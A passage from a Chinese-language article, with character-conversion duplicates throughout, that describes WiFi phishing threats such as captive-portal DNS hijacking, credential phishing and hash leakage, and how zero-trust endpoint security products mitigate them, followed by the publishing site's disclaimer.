    lCaptive Portal安全加固——Captive Portal實(shí)現(xiàn)依賴于階段性的DNS劫持,如果一開(kāi)始就修正DNS,可能導(dǎo)致用戶無(wú)法跳轉(zhuǎn)到認(rèn)證頁(yè)面完成認(rèn)證。因此,需要對(duì)Captive Portal進(jìn)行檢測(cè)并實(shí)施相應(yīng)的加固。在用戶完成網(wǎng)絡(luò)認(rèn)證后,再進(jìn)行DNS緩存清理和修正工作。

    ¡認(rèn)證網(wǎng)頁(yè)釣魚(yú)——攻擊者可能利用Captive Portal認(rèn)證頁(yè)面對(duì)員工進(jìn)行社工欺騙,獲取其敏感信息等。零信任終端安全產(chǎn)品可以對(duì)Captive Portal瀏覽器進(jìn)行安全加固,并加上醒目的安全提示,避免員工主動(dòng)輸入企業(yè)相關(guān)敏感信息。

    ¡Windows hash泄漏——零信任終端安全產(chǎn)品可以對(duì)此進(jìn)行安全加固,防止Windows hash被泄漏。

    l局域網(wǎng)攻擊威脅——當(dāng)員工設(shè)備連入目標(biāo)無(wú)線網(wǎng)絡(luò)后,設(shè)備所開(kāi)放的各種服務(wù)端口可能被局域網(wǎng)中的其他設(shè)備所利用或攻擊,零信任終端安全產(chǎn)品同樣具有傳統(tǒng)終端安全軟件的防護(hù)能力,以發(fā)現(xiàn)并阻斷來(lái)自網(wǎng)絡(luò)的攻擊。

    l敏感信息監(jiān)聽(tīng)威脅——攻擊者可在網(wǎng)關(guān)處監(jiān)聽(tīng)到所有的明文流量,零信任終端安全產(chǎn)品通過(guò)開(kāi)啟全鏈路加密來(lái)避免鏈路上的監(jiān)聽(tīng)威脅。

    通過(guò)對(duì)以上攻擊手段的逐一分析,可以發(fā)現(xiàn),零信任架構(gòu)下的終端安全產(chǎn)品可以在無(wú)線網(wǎng)絡(luò)接入的多個(gè)階段幫助設(shè)備緩解攻擊威脅。在對(duì)內(nèi)網(wǎng)服務(wù)發(fā)起訪問(wèn)請(qǐng)求時(shí),可以對(duì)設(shè)備進(jìn)行多維度的安全合規(guī)驗(yàn)證,驗(yàn)證失敗時(shí)請(qǐng)求會(huì)被拒絕,告知用戶當(dāng)前異常狀態(tài)并幫助用戶進(jìn)行相應(yīng)清洗。當(dāng)驗(yàn)證通過(guò)后,會(huì)建立起全鏈路加密來(lái)保護(hù)所有網(wǎng)絡(luò)流量。

    黑客視角揭秘WiFi釣魚(yú),零信任帶來(lái)防護(hù)突破

    正因如此,筆者認(rèn)為零信任架構(gòu)可以很好的幫助企業(yè)解決無(wú)線釣魚(yú)攻擊等各類(lèi)無(wú)線安全頑疾。

    (免責(zé)聲明:本網(wǎng)站內(nèi)容主要來(lái)自原創(chuàng)、合作伙伴供稿和第三方自媒體作者投稿,凡在本網(wǎng)站出現(xiàn)的信息,均僅供參考。本網(wǎng)站將盡力確保所提供信息的準(zhǔn)確性及可靠性,但不保證有關(guān)資料的準(zhǔn)確性及可靠性,讀者在使用前請(qǐng)進(jìn)一步核實(shí),并對(duì)任何自主決定的行為負(fù)責(zé)。本網(wǎng)站對(duì)有關(guān)資料所引致的錯(cuò)誤、不確或遺漏,概不負(fù)任何法律責(zé)任。
    任何單位或個(gè)人認(rèn)為本網(wǎng)站中的網(wǎng)頁(yè)或鏈接內(nèi)容可能涉嫌侵犯其知識(shí)產(chǎn)權(quán)或存在不實(shí)內(nèi)容時(shí),應(yīng)及時(shí)向本網(wǎng)站提出書(shū)面權(quán)利通知或不實(shí)情況說(shuō)明,并提供身份證明、權(quán)屬證明及詳細(xì)侵權(quán)或不實(shí)情況證明。本網(wǎng)站在收到上述法律文件后,將會(huì)依法盡快聯(lián)系相關(guān)文章源頭核實(shí),溝通刪除相關(guān)內(nèi)容或斷開(kāi)相關(guān)鏈接。 )